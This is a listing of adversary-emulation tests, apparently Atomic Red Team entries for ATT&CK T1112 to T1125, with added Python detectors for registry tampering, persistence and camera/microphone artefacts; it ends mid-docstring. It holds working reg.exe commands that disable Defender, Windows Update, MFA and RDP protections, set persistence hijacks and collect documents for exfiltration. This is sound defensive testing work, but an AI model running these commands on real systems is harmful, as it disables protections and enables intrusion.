T1112 command_prompt elevated windows Enabling Remote Desktop Protocol via Remote Registry
Modify Registry
Modify the RDP-Tcp listener's SecurityLayer value through the registry (locally, or remotely via the Remote Registry service). A value of 0 selects the legacy RDP Security Layer instead of Negotiate (1) or TLS (2), weakening the transport security of incoming RDP connections.
reg add "hklm\SYSTEM\CurrentControlSet\Control\Terminal Server\Winstations\RDP-Tcp" /v SecurityLayer /t REG_DWORD /d 0 /f
T1112 command_prompt elevated windows Disable Win Defender Notification
Modify Registry
Disable Windows Defender Security Center notifications through the policy key. RedLine Stealer uses this to disable this Windows Defender feature.
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d 1 /f
T1112 command_prompt elevated windows Disable Windows OS Auto Update
Modify Registry
Disable the Windows OS automatic update feature (NoAutoUpdate = 1). RedLine Stealer uses this as part of its defense evasion.
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v "NoAutoUpdate" /t REG_DWORD /d 1 /f
T1112 command_prompt elevated windows Disable Windows Auto Reboot for current logon user
Modify Registry
Prevent Windows from automatically rebooting after updates while users are logged on (NoAutoRebootWithLoggedOnUsers = 1). RedLine Stealer uses this as part of its defense evasion.
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v "NoAutoRebootWithLoggedOnUsers" /t REG_DWORD /d 1 /f
T1112 command_prompt elevated windows Windows Auto Update Option to Notify before download
Modify Registry
Set the Windows automatic update option to "notify before download" (AUOptions = 2). RedLine Stealer uses this as part of its defense evasion.
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v "AUOptions" /t REG_DWORD /d 2 /f
T1112 command_prompt elevated windows Do Not Connect To Win Update
Modify Registry
Stop Windows Update from contacting Windows Update Internet locations (DoNotConnectToWindowsUpdateInternetLocations = 1). RedLine Stealer uses this as part of its defense evasion.
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate" /v "DoNotConnectToWindowsUpdateInternetLocations" /t REG_DWORD /d 1 /f
T1112 command_prompt elevated windows Tamper Win Defender Protection
Modify Registry
Tamper with the Windows Defender Tamper Protection setting. RedLine Stealer executes another component file to modify this feature in the registry. Take note that this modification alone might not be enough to disable the feature, but it is a good indicator of a malicious process trying to tamper with Windows Defender settings.
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d 0 /f
T1112 command_prompt elevated windows Allow Simultaneous Download Registry
Modify Registry
A registry modification that raises the WinINet per-server connection limits (MaxConnectionsPerServer and MaxConnectionsPer1_0Server) to allow more simultaneous downloads on the system.
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "MaxConnectionsPerServer" /t REG_DWORD /d 10 /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "MaxConnectionsPer1_0Server" /t REG_DWORD /d 10 /f
T1112 command_prompt windows Modify Internet Zone Protocol Defaults in Current User Registry - cmd
Modify Registry
This test simulates an adversary modifying the Internet Zone Protocol Defaults in the registry of the currently logged-in user using reg.exe via the command prompt. Such modifications can indicate an adversary trying to weaken browser security settings: a value of 0 maps the protocol to the Local Computer zone (zone 0), the least restrictive zone. Upon execution, if successful, the message "The operation completed successfully." will be displayed. To verify the effects of the test: 1. Open the Registry Editor (regedit.exe). 2. Navigate to "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults". 3. Check for the presence of the "http" and "https" DWORD values set to 0. Or run: reg query "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults"
reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults" /v http /t REG_DWORD /d 0 /F
reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults" /v https /t REG_DWORD /d 0 /F
T1112 command_prompt windows Activities To Disable Secondary Authentication Detected By Modified Registry Value.
Modify Registry
Disable the secondary authentication factor policy (AllowSecondaryAuthenticationDevice = 0). Adversaries disable secondary authentication to bypass MFA and gain unauthorized access to the system or to sensitive data. See the related article (https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.SecondaryAuthenticationFactor::MSSecondaryAuthFactor_AllowSecondaryAuthenticationDevice).
reg add "HKLM\SOFTWARE\Policies\Microsoft\SecondaryAuthenticationFactor" /v "AllowSecondaryAuthenticationDevice" /t REG_DWORD /d 0 /f
T1112 command_prompt windows Activities To Disable Microsoft [FIDO Aka Fast IDentity Online] Authentication Detected By Modified Registry Value.
Modify Registry
Disable Microsoft FIDO device sign-on through the registry. An adversary who disables FIDO authentication and then obtains login credentials (e.g., passwords) can impersonate the user and access sensitive accounts or data; it also increases the risk of a successful phishing attack. See the related article (https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.FidoAuthentication::AllowFidoDeviceSignon).
reg add "HKLM\SOFTWARE\Policies\Microsoft\FIDO" /v "AllowExternalDeviceSignon" /t REG_DWORD /d 0 /f
T1112 command_prompt windows Scarab Ransomware Defense Evasion Activities
Modify Registry
Scarab ransomware's defense evasion modifies the Credential Security Support Provider (CredSSP) policy in the registry to overcome potential RDP connection issues. Setting AllowEncryptionOracle to 2 selects the "Vulnerable" encryption oracle remediation level, which lets the host connect to unpatched CredSSP peers. [Scarab Ransomware Article](https://www.welivesecurity.com/en/eset-research/scarabs-colon-izing-vulnerable-servers/)
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\CredSSP\Parameters" /v AllowEncryptionOracle /t REG_DWORD /d 2 /f
T1112 command_prompt windows Disable Remote Desktop Anti-Alias Setting Through Registry
Modify Registry
A registry modification to disable the RDP anti-alias setting. This technique was seen in DarkGate malware as part of its installation.
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\Terminal Services" /v "DisableRemoteDesktopAntiAlias" /t REG_DWORD /d 1 /f
T1112 command_prompt windows Disable Remote Desktop Security Settings Through Registry
Modify Registry
A registry modification to disable RDP security settings. This technique was seen in DarkGate malware as part of its installation.
reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\Terminal Services" /v "DisableSecuritySettings" /t REG_DWORD /d 1 /f
T1112 command_prompt windows Disabling ShowUI Settings of Windows Error Reporting (WER)
Modify Registry
A registry modification to disable the ShowUI setting of Windows Error Reporting (DontShowUI = 1), which suppresses error reporting dialogs and prompts. This technique was seen in DarkGate malware as part of its installation.
reg add "HKCU\Software\Microsoft\Windows\Windows Error Reporting" /v DontShowUI /t REG_DWORD /d 1 /f
T1112 command_prompt windows Enable Proxy Settings
Modify Registry
A registry modification to enable the WinINet proxy setting for the current user. This technique was seen in DarkGate malware as part of its installation.
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyEnable /t REG_DWORD /d 1 /f
T1112 command_prompt windows Set-Up Proxy Server
Modify Registry
A registry modification to set the WinINet proxy server for the current user. This technique was seen in DarkGate malware as part of its installation.
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyServer /t REG_SZ /d "proxy.atomic-test.com:8080" /f
T1112 command_prompt windows RDP Authentication Level Override
Modify Registry
A registry modification to override the RDP client's server authentication level. This technique was seen in DarkGate malware as part of its installation.
reg add "HKCU\Software\Microsoft\Terminal Server Client" /v AuthenticationLevelOverride /t REG_DWORD /d 0 /f
T1112 command_prompt elevated windows Enable RDP via Registry (fDenyTSConnections)
Modify Registry
Modify the registry value of fDenyTSConnections to allow incoming RDP connections. This activity has been observed by multiple ransomware groups, including Hive ransomware. [Reference](https://www.rapid7.com/blog/post/2023/01/11/increasing-the-sting-of-hive-ransomware/)
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
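Every T1112 test above comes down to a single registry write, which is exactly what Sysmon Event ID 13 (RegistryEvent, value set) records. The following Python is an added example, not Atomic Red Team code: it matches constructed Event ID 13 records against the keys and values used by the PowerShell logging, Restricted Admin, Safe Mode service, Windows Defender notification and tamper-protection, Event Viewer redirection and RDP (SecurityLayer, fDenyTSConnections) tests. The rule table, the folding of HKU\<SID> paths to HKCU, and the sample events are assumptions made for this example; tune the rules against your own baseline before deploying them.

```python
"""Match Sysmon Event ID 13 (value set) records against the T1112 registry writes
exercised on this page. Added example, not Atomic Red Team code; sample events
are constructed for illustration."""
import re
from dataclasses import dataclass
from typing import Callable, Iterable, List, Tuple

# Sysmon logs per-user hives as HKU\<SID>\...; fold them to HKCU so one rule
# covers the HKCU variant these tests write and the HKLM variant a GPO writes.
_USER_SID_RE = re.compile(r"^HKU\\S-1-5-21-[\d-]+\\", re.IGNORECASE)


def split_target(target_object: str) -> Tuple[str, str]:
    """Split a TargetObject into (lower-cased, hive-normalised key path, value name)."""
    key, _, value = target_object.rpartition("\\")
    key = _USER_SID_RE.sub(lambda _m: "HKCU\\", key)
    key = key.replace("HKEY_LOCAL_MACHINE", "HKLM").replace("HKEY_CURRENT_USER", "HKCU")
    return key.lower(), value


def parse_details(details: str):
    """Sysmon renders numeric data as 'DWORD (0x00000001)'; strings are verbatim."""
    m = re.fullmatch(r"(?:DWORD|QWORD) \((0x[0-9a-fA-F]+)\)", details)
    return int(m.group(1), 16) if m else details


@dataclass(frozen=True)
class Rule:
    name: str
    key_re: str                       # regex searched in the normalised key path
    value_re: str                     # regex fully matched against the lower-cased value name
    check: Callable[[object], bool]   # predicate on the decoded data


RULES = [
    Rule("PowerShell logging disabled",
         r"\\policies\\microsoft\\windows\\powershell\\(scriptblocklogging|modulelogging|transcription)$",
         r"enable(scriptblocklogging|modulelogging|transcripting)", lambda d: d == 0),
    Rule("Restricted Admin mode enabled (RDP pass-the-hash)",
         r"\\control\\lsa$", r"disablerestrictedadmin", lambda d: d == 0),
    Rule("Defender tamper protection cleared",
         r"\\windows defender\\features$", r"tamperprotection", lambda d: d == 0),
    Rule("Defender notifications suppressed",
         r"\\windows defender\\ux configuration$", r"notification_suppress", lambda d: d == 1),
    Rule("Defender Security Center notifications disabled",
         r"\\windows defender security center\\notifications$", r"disablenotifications", lambda d: d == 1),
    Rule("RDP listener enabled",
         r"\\control\\terminal server$", r"fdenytsconnections", lambda d: d == 0),
    Rule("RDP security layer downgraded",
         r"\\winstations\\rdp-tcp$", r"securitylayer", lambda d: d == 0),
    Rule("Service registered for Safe Mode start",
         r"\\control\\safeboot\\(minimal|network)\\[^\\]+$", r"\(default\)",
         lambda d: str(d).lower() == "service"),
    Rule("Event Viewer help redirected",
         r"\\windows nt\\currentversion\\event viewer$", r"microsoftredirection(url|program)",
         lambda d: True),
]


def scan(events: Iterable[dict]) -> List[Tuple[str, str, str]]:
    """Return (rule name, writing image, TargetObject) for each matching SetValue event."""
    hits: List[Tuple[str, str, str]] = []
    for ev in events:
        if ev.get("EventType") != "SetValue":
            continue
        key, value = split_target(ev["TargetObject"])
        data = parse_details(ev.get("Details", ""))
        for rule in RULES:
            if (re.search(rule.key_re, key)
                    and re.fullmatch(rule.value_re, value.lower())
                    and rule.check(data)):
                hits.append((rule.name, ev.get("Image", "?"), ev["TargetObject"]))
    return hits


def _ev(target: str, details: str, image: str = r"C:\Windows\System32\reg.exe") -> dict:
    return {"EventType": "SetValue", "Image": image, "TargetObject": target, "Details": details}


USER = r"HKU\S-1-5-21-1111111111-222222222-3333333333-1001"   # constructed SID
SAMPLE_EVENTS = [   # constructed Event ID 13 records, not real telemetry
    _ev(USER + r"\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging\EnableScriptBlockLogging", "DWORD (0x00000000)"),
    _ev(r"HKLM\System\CurrentControlSet\Control\Lsa\DisableRestrictedAdmin", "DWORD (0x00000000)"),
    _ev(r"HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\AtomicSafeMode\(Default)", "Service"),
    _ev(r"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\UX Configuration\Notification_Suppress", "DWORD (0x00000001)"),
    # Writes that must stay quiet: protection being re-enabled, and an unrelated Explorer setting.
    _ev(r"HKLM\System\CurrentControlSet\Control\Lsa\DisableRestrictedAdmin", "DWORD (0x00000001)", r"C:\Windows\System32\svchost.exe"),
    _ev(USER + r"\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden", "DWORD (0x00000001)", r"C:\Windows\explorer.exe"),
]

if __name__ == "__main__":
    for name, image, target in scan(SAMPLE_EVENTS):
        print(f"[T1112] {name}: {image} wrote {target}")
```

Each rule carries a predicate on the decoded data rather than matching the key alone, so a write that restores the secure value (DisableRestrictedAdmin back to 1, for instance) does not fire; when you run a test from this page and then its cleanup, only the first write should produce a hit.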
T1112 command_prompt elevated windows Disable Windows Prefetch Through Registry
Modify Registry
Modify the registry of the machine to disable Prefetch. Disabling Prefetch removes one artifact used as evidence of application execution. A restart is required for the change to take effect.
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters" /v "EnablePrefetcher" /t REG_DWORD /d 0 /f
T1112 command_prompt elevated windows Flush Shimcache
Modify Registry
The ShimCache (AppCompatCache) is a Windows component that stores information about recently executed applications; the operating system uses it to speed up application launches. It is also used by IR and forensic teams: investigators can use the ShimCache to determine which programs have been executed on a system, even if they have since been deleted or their logs cleared. Reference: https://blueteamops.medium.com/shimcache-flush-89daff28d15e
Rundll32.exe apphelp.dll,ShimFlushCache
T1112 command_prompt elevated windows Disable Windows Remote Desktop Protocol
Modify Registry
Modify the registry of the machine to disable remote desktop protocol.
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f
T1112 command_prompt elevated windows Enforce Smart Card Authentication Through Registry
Modify Registry
Force smart card logon through the registry (scforceoption = 1), so that interactive logons require a smart card.
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v scforceoption /t REG_DWORD /d 1 /f
T1112 command_prompt elevated windows Requires the BitLocker PIN for Pre-boot authentication
Modify Registry
Enable the BitLocker "Require additional authentication at startup" policy (UseAdvancedStartup = 1), the prerequisite for requiring a pre-boot PIN.
reg add "HKLM\SOFTWARE\Policies\Microsoft\FVE" /v UseAdvancedStartup /t REG_DWORD /d 1 /f
T1112 command_prompt elevated windows Modify EnableBDEWithNoTPM Registry entry
Modify Registry
Allow BitLocker without a compatible TPM (requires a password)
reg add "HKLM\SOFTWARE\Policies\Microsoft\FVE" /v EnableBDEWithNoTPM /t REG_DWORD /d 1 /f
T1112 command_prompt elevated windows Modify UseTPM Registry entry
Modify Registry
Configure use of the Trusted Platform Module (TPM) at BitLocker startup. For the UseTPM* policy values, 0 = do not allow, 1 = require and 2 = allow.
reg add "HKLM\SOFTWARE\Policies\Microsoft\FVE" /v UseTPM /t REG_DWORD /d 2 /f
T1112 command_prompt elevated windows Modify UseTPMPIN Registry entry
Modify Registry
Allow startup PIN with TPM for Bitlocker tool
reg add "HKLM\SOFTWARE\Policies\Microsoft\FVE" /v UseTPMPIN /t REG_DWORD /d 2 /f
T1112 command_prompt elevated windows Modify UseTPMKey Registry entry
Modify Registry
Allow startup key with TPM for Bitlocker tool
reg add "HKLM\SOFTWARE\Policies\Microsoft\FVE" /v UseTPMKey /t REG_DWORD /d 2 /f
T1112 command_prompt elevated windows Modify UseTPMKeyPIN Registry entry
Modify Registry
Allow startup key and PIN with TPM for Bitlocker tool
reg add "HKLM\SOFTWARE\Policies\Microsoft\FVE" /v UseTPMKeyPIN /t REG_DWORD /d 2 /f
T1112 command_prompt elevated windows Modify EnableNonTPM Registry entry
Modify Registry
Allow Bitlocker without TPM for Bitlocker tool
reg add "HKLM\SOFTWARE\Policies\Microsoft\FVE" /v EnableNonTPM /t REG_DWORD /d 1 /f
T1112 command_prompt elevated windows Modify UsePartialEncryptionKey Registry entry
Modify Registry
Allow startup key with TPM for Bitlocker tool
reg add "HKLM\SOFTWARE\Policies\Microsoft\FVE" /v UsePartialEncryptionKey /t REG_DWORD /d 2 /f
T1112 command_prompt elevated windows Modify UsePIN Registry entry
Modify Registry
Allow startup PIN with TPM for Bitlocker tool
reg add "HKLM\SOFTWARE\Policies\Microsoft\FVE" /v UsePIN /t REG_DWORD /d 2 /f
T1112 command_prompt elevated windows Abusing Windows TelemetryController Registry Key for Persistence
Modify Registry
The Windows Compatibility Telemetry system makes use of the CompatTelRunner.exe binary to run a variety of telemetry tasks. It relies on the registry for instructions on which commands to run. It will run any arbitrary command without restriction of location or type. Blog: https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\TelemetryController\#{new_key}" /t REG_SZ /v Command /d #{new_executable} /f
T1112 command_prompt elevated windows Modify RDP-Tcp Initial Program Registry Entry
Modify Registry
If the fInheritInitialProgram value is set to 1, the exe indicated in the InitialProgram value is automatically started on RDP connection. Once the test commands are run, notepad will execute automatically on new RDP connection
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v fInheritInitialProgram /t REG_DWORD /d 1 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v InitialProgram /t REG_SZ /d "C:\Windows\System32\notepad.exe" /f
T1112 command_prompt elevated windows Abusing MyComputer Disk Cleanup Path for Persistence
Modify Registry
Replacing the default executable in this registry value with a custom one causes the replacement program to run whenever the OS launches the corresponding activity (here, Disk Cleanup).
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\cleanuppath" /t REG_EXPAND_SZ /d "%systemroot%\system32\notepad.exe" /f
T1112 command_prompt elevated windows Abusing MyComputer Disk Fragmentation Path for Persistence
Modify Registry
Replacing the default executable in this registry value with a custom one causes the replacement program to run whenever the OS launches the corresponding activity (here, disk defragmentation).
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\DefragPath" /t REG_EXPAND_SZ /d "%systemroot%\system32\notepad.exe" /f
T1112 command_prompt elevated windows Abusing MyComputer Disk Backup Path for Persistence
Modify Registry
Replacing the default executable in this registry value with a custom one causes the replacement program to run whenever the OS launches the corresponding activity (here, Backup).
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\BackupPath" /t REG_EXPAND_SZ /d "%systemroot%\system32\notepad.exe" /f
T1112 command_prompt elevated windows Adding custom paths for application execution
Modify Registry
As per Microsoft, the entries found under App Paths are used primarily to map an application's executable file name to that file's fully qualified path and to pre-pend information to the PATH environment variable on a per-application, per-process basis. The path can be modified to load a custom application of choice. After this test's registry change, running msedge.exe from the Start menu or the Run dialog launches notepad instead.
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\#{app_name}" /t REG_SZ /d #{new_path} /f
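The persistence tests above (TelemetryController, RDP-Tcp InitialProgram, the three MyComputer paths and App Paths) leave their payload in registry values that a plain reg query dumps. The following Python is an added example, not Atomic Red Team code: it parses the text that `reg query <key> /s` prints and audits the parsed tree with one check per test. The default MyComputer paths and the expectation that genuine TelemetryController commands invoke CompatTelRunner.exe are assumptions about a clean Windows 10 host, and the sample dump is constructed to place the test writes next to untouched entries; confirm the baseline against a known-good machine before relying on it.

```python
"""Audit a `reg query ... /s` dump for the registry persistence used by the
TelemetryController, RDP-Tcp InitialProgram, MyComputer and App Paths tests.
Added example, not Atomic Red Team code; baseline values are assumptions."""
import re
from typing import Dict, List, Tuple

RegTree = Dict[str, Dict[str, Tuple[str, str]]]   # key -> {value name: (type, data)}


def parse_reg_query(text: str) -> RegTree:
    """Parse reg.exe output: an unindented key line, then value lines of the form
    '    <name>    <type>    <data>' (fields separated by four spaces)."""
    tree: RegTree = {}
    current = None
    for raw in text.splitlines():
        if not raw.strip():
            continue
        if not raw.startswith(" "):
            current = raw.strip()
            tree.setdefault(current, {})
            continue
        if current is None:
            raise ValueError(f"value line before any key: {raw!r}")
        parts = raw.strip().split("    ", 2)
        data = parts[2] if len(parts) == 3 else ""   # an empty REG_SZ prints no data field
        tree[current][parts[0]] = (parts[1], data)
    return tree


# Assumed clean-host defaults for the three MyComputer paths.
MYCOMPUTER_BASELINE = {
    "cleanuppath": r"%SystemRoot%\system32\cleanmgr.exe /D %c",
    "defragpath": r"%systemroot%\system32\dfrgui.exe",
    "backuppath": r"%SystemRoot%\system32\sdclt.exe",
}
MYCOMPUTER_ROOT = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer".lower()
APP_PATHS_ROOT = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths".lower()
TELEMETRY_ROOT = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\TelemetryController".lower()
RDP_TCP_KEY = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp".lower()
# Assumption: genuine TelemetryController commands invoke CompatTelRunner.exe from System32.
_TELEMETRY_OK = re.compile(r"^(%windir%|%systemroot%|c:\\windows)\\system32\\compattelrunner\.exe(\s|$)")


def _norm(data: str) -> str:
    return data.strip().strip('"').lower()


def _exe_name(data: str) -> str:
    """Executable file name from a path that may carry trailing arguments."""
    return _norm(data).rsplit("\\", 1)[-1].split(" ", 1)[0]


def audit(tree: RegTree) -> List[str]:
    """One check per persistence location; returns human-readable findings."""
    findings: List[str] = []
    for key, values in tree.items():
        parent, _, leaf = key.rpartition("\\")
        parent, name = parent.lower(), leaf.lower()
        default = values.get("(Default)", ("", ""))[1]
        if parent == MYCOMPUTER_ROOT and name in MYCOMPUTER_BASELINE:
            if _norm(default) != _norm(MYCOMPUTER_BASELINE[name]):
                findings.append(f"MyComputer\\{leaf} hijacked: {default}")
        elif parent == APP_PATHS_ROOT and default and _exe_name(default) != name:
            findings.append(f"App Paths\\{leaf} resolves to a different binary: {default}")
        elif parent == TELEMETRY_ROOT and "Command" in values:
            cmd = values["Command"][1]
            if not _TELEMETRY_OK.match(_norm(cmd)):
                findings.append(f"TelemetryController\\{leaf} runs a non-telemetry command: {cmd}")
        elif key.lower() == RDP_TCP_KEY:
            inherit = values.get("fInheritInitialProgram", ("", "0x0"))[1]
            program = values.get("InitialProgram", ("", ""))[1]
            if int(inherit, 16) == 1 and program:
                findings.append(f"RDP-Tcp InitialProgram forced on every RDP logon: {program}")
    return findings


# Constructed dump: the tests' writes interleaved with entries left at their defaults.
SAMPLE_REG_QUERY = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\cleanuppath
    (Default)    REG_EXPAND_SZ    %systemroot%\system32\notepad.exe

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\DefragPath
    (Default)    REG_EXPAND_SZ    %systemroot%\system32\dfrgui.exe

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\msedge.exe
    (Default)    REG_SZ    C:\Windows\System32\notepad.exe
    Path    REG_SZ    C:\Program Files (x86)\Microsoft\Edge\Application

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\notepad.exe
    (Default)    REG_SZ    C:\Windows\System32\notepad.exe

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\TelemetryController\Compatibility Appraiser
    Command    REG_SZ    %windir%\system32\CompatTelRunner.exe -m:appraiser.dll -f:DoScheduledTelemetryRun

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\TelemetryController\AtomicTest
    Command    REG_SZ    C:\Users\Public\updater.exe

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp
    fInheritInitialProgram    REG_DWORD    0x1
    InitialProgram    REG_SZ    C:\Windows\System32\notepad.exe
"""

if __name__ == "__main__":
    for finding in audit(parse_reg_query(SAMPLE_REG_QUERY)):
        print("[!]", finding)
```

On a live host, feed the script the output of `reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer" /s` and the other three roots concatenated; the App Paths check needs no baseline at all, since it only asks whether the (Default) value still names the executable the subkey is for.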
T1115 command_prompt windows Utilize Clipboard to store or execute commands from
Clipboard Data
Add data to clipboard to copy off or execute commands from.
dir | clip
echo "T1115" > %temp%\T1115.txt
clip < %temp%\T1115.txt
T1119 command_prompt windows Automated Collection Command Prompt
Automated Collection
Automated Collection. Upon execution, check the users temp directory (%temp%) for the folder T1119_command_prompt_collection to see what was collected.
mkdir %temp%\T1119_command_prompt_collection >nul 2>&1
dir c: /b /s .docx | findstr /e .docx
for /R c:\ %f in (*.docx) do copy /Y %f %temp%\T1119_command_prompt_collection
T1119 command_prompt windows Recon information for export with Command Prompt
Automated Collection
collect information for exfiltration. Upon execution, check the users temp directory (%temp%) for files T1119_*.txt to see what was collected.
sc query type=service > %TEMP%\T1119_1.txt
doskey /history > %TEMP%\T1119_2.txt
wmic process list > %TEMP%\T1119_3.txt
tree C:\AtomicRedTeam\atomics > %TEMP%\T1119_4.txt
T1120 command_prompt windows Peripheral Device Discovery via fsutil
Peripheral Device Discovery
Performs peripheral device discovery using fsutil to list all drives.
fsutil fsinfo drives
T1123 command_prompt windows Registry artefact when application use microphone
Audio Capture
Write the CapabilityAccessManager ConsentStore artefacts (LastUsedTimeStart and LastUsedTimeStop FILETIME values under a NonPackaged subkey named after the executable) that Windows records when an application uses the microphone. See [can-you-track-processes-accessing-the-camera-and-microphone](https://svch0st.medium.com/can-you-track-processes-accessing-the-camera-and-microphone-7e6885b37072)
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\microphone\NonPackaged\C:#Windows#Temp#atomic.exe /v LastUsedTimeStart /t REG_BINARY /d a273b6f07104d601 /f
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\microphone\NonPackaged\C:#Windows#Temp#atomic.exe /v LastUsedTimeStop /t REG_BINARY /d 96ef514b7204d601 /f
T1124 command_prompt windows System Time Discovery
System Time Discovery
Identify the system time. Upon execution, the local computer system time and timezone will be displayed.
net time \\#{computer_name}
w32tm /tz
T1124 command_prompt windows System Time Discovery W32tm as a Delay
System Time Discovery
Identifies DCRat's use of w32tm as a delay tactic. https://research.splunk.com/endpoint/b2cc69e7-11ba-42dc-a269-59c069a48870/ https://blogs.blackberry.com/en/2022/05/dirty-deeds-done-dirt-cheap-russian-rat-offers-backdoor-bargains
W32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
T1124 command_prompt windows System Time with Windows time Command
System Time Discovery
Displays the current system time via the Windows builtin time command: https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/time Recently observed in use in the wild during an incident involving Ursnif malware: https://github.com/The-DFIR-Report/Sigma-Rules/blob/dc72f0b557fc63347379be0a33439788256761c8/rules/windows/process_creation/proc_creation_win_system_time_lookup.yml https://thedfirreport.com/2023/01/09/unwrapping-ursnifs-gifts/
time
T1124 command_prompt windows Discover System Time Zone via Registry
System Time Discovery
Identify the Operating System Time Zone via registry with the reg.exe command. Upon execution, the system Time Zone will be shown.
reg query "HKLM\SYSTEM\CurrentControlSet\Control\TimeZoneInformation" /v TimeZoneKeyName
T1125 command_prompt windows Registry artefact when application use webcam
Video Capture
Write the CapabilityAccessManager ConsentStore artefacts (LastUsedTimeStart and LastUsedTimeStop FILETIME values under a NonPackaged subkey named after the executable) that Windows records when an application uses the webcam. See [can-you-track-processes-accessing-the-camera-and-microphone](https://svch0st.medium.com/can-you-track-processes-accessing-the-camera-and-microphone-7e6885b37072)
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\webcam\NonPackaged\C:#Windows#Temp#atomic.exe /v LastUsedTimeStart /t REG_BINARY /d a273b6f07104d601 /f
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\webcam\NonPackaged\C:#Windows#Temp#atomic.exe /v LastUsedTimeStop /t REG_BINARY /d 96ef514b7204d601 /f
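Both ConsentStore tests (microphone and webcam) write LastUsedTimeStart and LastUsedTimeStop as REG_BINARY little-endian FILETIME values and encode the executable path in the subkey name with '#' in place of '\'. The following Python is an added example, not Atomic Red Team code, that decodes the key path and the two timestamps from the tests above into a usage record, which is what an analyst triaging these artefacts actually needs. Treating an all-zero stop value as "still in use" is an assumption.

```python
"""Decode CapabilityAccessManager ConsentStore artefacts (microphone/webcam usage).
Added example, not Atomic Red Team code."""
from datetime import datetime, timedelta, timezone
from typing import Dict, Optional, Tuple

_FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def decode_filetime(hex_le: str) -> datetime:
    """Convert the REG_BINARY hex string reg.exe accepts (8-byte little-endian
    FILETIME, 100 ns ticks since 1601-01-01 UTC) into an aware datetime."""
    raw = bytes.fromhex(hex_le)
    if len(raw) != 8:
        raise ValueError("FILETIME must be exactly 8 bytes")
    ticks = int.from_bytes(raw, "little")
    return _FILETIME_EPOCH + timedelta(microseconds=ticks // 10)


def parse_consent_store_key(key: str) -> Tuple[str, str]:
    """Return (device, executable) from a ConsentStore subkey path. NonPackaged
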